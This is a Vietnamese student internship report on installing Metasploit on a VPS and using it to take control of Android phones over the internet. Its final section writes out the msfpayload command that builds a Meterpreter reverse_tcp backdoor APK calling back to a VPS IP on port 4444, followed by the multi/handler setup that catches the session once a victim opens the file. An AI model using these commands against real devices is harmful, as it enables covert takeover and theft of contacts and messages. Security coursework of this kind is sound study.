TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
Vps
1. BÁO CÁO THỰC TẬP ATHENA
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP
ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN
NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI
RA NGOÀI
Sinh viên thực hiện: Nguyễn Đức Thắng
GVHD: Võ Đỗ Thắng
TP.HCM, 04/08/2014
2. Cài đặt Kali Linux trên máy ảo VMWare
TUẦN 3:
Cài đặt Metasploit trên VPS
1. Giới thiệu
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để
kiểm tra, tấn công và khai thác lỗi của các service.
2. Cài đặt
Ta vào trang chủ của Metasploit để tải Metasploit phiên bản mới nhất về :
http://www.metasploit.com/ ( hoặc ta có thể vào trang download của Metasploit :
http://www.rapid7.com/products/metasploit/download.jsp ).Ta chọn phiên bản
Community miễn phí và dùng cho nghiên cứu.
3. Sau khi tải về, ta cài đặt như những phần mềm khác.
Chọn folder cài đặt:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
4. Chọn server và ngày hết hạn ( ta để mặc định):
Quá trình cài đặt của Metasploit:
5. Tiến trình hoàn tất, chọn Finish. Vậy là ta đã cài đặt thành công Metasploit.
6. 3.Từ VPS điều khiển thiết bị ( điện thoai Android) qua internet
Đầu tiên, ta sử dụng Kali Linux để tạo file APK làm backdoor để
hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
(nếu ta đăng kí sử dụng Metasploit trên VPS máy ảo của Metasploit.com
thì địa chỉ là địa chỉ của máy ảo VPS được cung cấp).
Chúng ta vẫn sử dụng lệnh Msfpayload
android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R >
/root/Desktop/files.apk (ở đây địa chỉ VPS là 14.0.21.184)
Ta khởi động Metasploit Console trên VPS ( ta phải đăng nhập vào
địa chỉ máy ảo VPS bằng Remote Desktop Connection trước nếu dung
máy ảo VPS đăng kí sử dụng qua mạng ).
Kế tiếp ta thực hiện các bước xâm nhập giống như hack diện thoại
android bằng Kali Linux, chỉ khác ở địa chỉ IP là IP của VPS:
7. Use exploit/multi/handler
Set lhost 14.0.21.184 (địa chỉ IP của máy VPS)
Set lport 4444
Run (giống lệnh exploit trên Kali Linux)
Sau khi máy nạn nhân tải về file apk đã được tạo ra và mở lên,
máy android đó sẽ bị hack.